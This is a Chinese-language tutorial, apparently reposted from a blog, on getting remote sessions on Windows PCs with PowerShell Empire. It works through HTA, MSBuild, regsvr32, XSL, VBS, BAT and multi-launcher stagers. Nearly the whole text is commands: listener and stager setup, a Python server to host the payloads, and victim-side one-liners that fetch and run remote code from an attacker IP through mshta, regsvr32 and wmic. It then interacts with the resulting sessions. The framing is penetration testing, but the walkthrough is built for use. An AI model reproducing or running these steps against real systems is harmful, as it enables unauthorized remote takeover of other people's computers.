使用PowerShell Empire攻击Windows PC的多种方法

通过HTA开发

这种攻击有助于我们通过.hta利用Windows。当通过mshta.exe运行.hta文件时,它将以具有相似功能的.exe文件执行,这使我们无法破解。要了解有关此攻击的更多信息,请单击此处

运行类型

./empire

根据工作流程,首先,我们必须创建一个侦听器以侦听我们的本地计算机。键入以下命令:

listeners

运行上面的命令后,它将说“当前没有侦听器处于活动状态”,但是不用担心,我们现在进入侦听器界面。因此,在此侦听器界面中,输入:

uselistener http

set Host http://192.168.1.107

execute

现在已经创建了侦听器,在侦听器界面中键入“ back”以创建漏洞利用程序。为此,请输入:

usestager windows/hta

set Listener http

set OutFile /root/1.hta

execute

运行以上命令将创建一个.hta文件以用作恶意软件。使用以下命令启动python服务器,以共享我们的.hta文件:

python -m SimpleHTTPServer 8080

随着python服务器启动并运行,请在受害者的命令提示符下键入以下命令以执行我们的恶意文件:

mshta.exe http://192.168.1.107:8080/1.hta

执行以上命令后,您将拥有会话,以访问会话类型:

interact XDGM6HLE

sysinfo

通过MSBuild.exe利用

我们的下一个漏洞利用是通过MSBuild.exe,它将使您可以使用XML文件进行Windows的远程会话。要了解有关此攻击的详细信息,请单击此处。并使用以下漏洞利用类型:

listeners

uselistener http

set Host http://192.168.1.107

execute

这将创建一个侦听器,在侦听器界面中键入“ back”以创建一个利用程序。为此,请输入:

usestager windows/launcher_xml

set Listener http

execute

现在,在/ tmp中创建一个xml文件。将此文件复制到受害人的PC中(在Microsoft.NET Framework v4.0.30319 中),然后键入以下命令,运行该文件:

cd C:WindowsMicrosoft.NETFrameworkv4.0.30319

MSBuild.exe launcher.xml

因此,通过这种方式,您可以进行会话,以访问所述会话类型:

interact A8H14C7L

sysinfo

通过regsvr32开发

我们的下一个方法是通过regsvr32进行利用。要详细了解此攻击,请单击此处。与往常一样,我们必须先创建一个监听器才能监听我们的本地计算机。键入以下命令:

listeners

uselistener http

set Host http://192.168.1.107

execute

现在已经创建了侦听器,在侦听器界面中键入“ back”以创建漏洞利用程序。为此,键入:

usestager windows/launcher_sct

set Listener http

execute

这将在/ tmp中创建一个.sct文件。使用python服务器将此文件共享到受害者的PC,然后通过键入以下命令在受害者的PC的运行窗口中运行此文件:

regsvr32.exe /u /n /s /i:http//192.168.1.107:8080/launcher.sct scrobj.dll

因此,您将有一个活动的会话。要访问会话类型:

interact <session name>

sysinfo

通过XSL开发

XSL是一种可以帮助您格式化数据的语言,它还描述了Web服务器如何使用XML进行交互。我们对帝国的下一种攻击方法是利用.xsl文件。对于此方法,首先输入以下命令激活我们的侦听器:

listeners

uselistener http

set Host http://192.168.1.107

execute

侦听器启动并运行后,创建您的利用程序:

usestager windows/launcher_xsl

set Listener http

execute

这样,将创建.xsl文件。现在从创建.xsl文件的文件夹中运行python服务器,如下图所示:

cd /tmp

python -m SimpleHTTPServer 8080

现在,在受害者的命令提示符下执行以下命令:

wmic process get brief /format:"http://192.168.1.107:8080/launcher.xsl"

在上面运行将提供一个会话,以访问该会话类型:

interact <session name>

sysinfo

通过Visual Basic脚本利用

我们的下一个方法是创建一个恶意VBS文件并通过它利用我们的受害者。像往常一样,让我们​​先创建一个监听器。

listeners

uselistener http

set Host http://192.168.1.107

execute

现在,创建我们的恶意.vbs文件类型:

usestager windows/launcher_vbs

set Listener http

execute

下一步是通过键入以下命令来启动python服务器:

python -m SimpleHTTPServer 8080

.vbs文件通过python服务器共享并在受害者的PC中执行后,您将拥有会话,就像访问会话类型之前一样:

interact <session name>

sysinfo

通过bat文件利用

在这种方法中,我们将通过.bat文件进行利用。就像我们之前的漏洞利用一样,这次也创建一个侦听器。为此,键入:

listeners

uselistener http

set Host http://192.168.1.107

execute

back

上面的命令将为您创建一个侦听器。让我们使用以下命令创建.bat文件:

usestager windows/launcher_bat

use Listener http

set OutFile /root/1.bat

execute

如图所示,以上命令将创建一个.bat文件。使用以下命令启动python服务器,以允许您在受害者的PC上共享.bat文件。

python -m SimpleHTTPServer 8080

运行.bat文件后,将激活一个会话。要访问会话类型:

interact <session name>

sysinfo

多发射器

这是本文的最后一种方法。可以再次在各种平台(例如Windows,Linux等)上使用它,即使对于这种方法,也可以创建一个侦听器:

listeners

uselistener http

set Host http://192.168.1.107

execute

然后键入以下命令来创建您的恶意文件:

usestager multi/launcher

set Listener http

execute

在上述命令后按Enter键,它将为您提供代码。复制此代码并将其粘贴到受害者的命令提示符中,然后按Enter。按下Enter键后,您将激活一个会话。要访问会话,请输入:

interact <session name>

sysinfo

结论

以上是可用于利用不同漏洞利用Windows的方法。使用此框架是Metasploit之后笔测试技巧的补充。请享用!

原文地址:https://www.cnblogs.com/sup3rman/p/13724590.html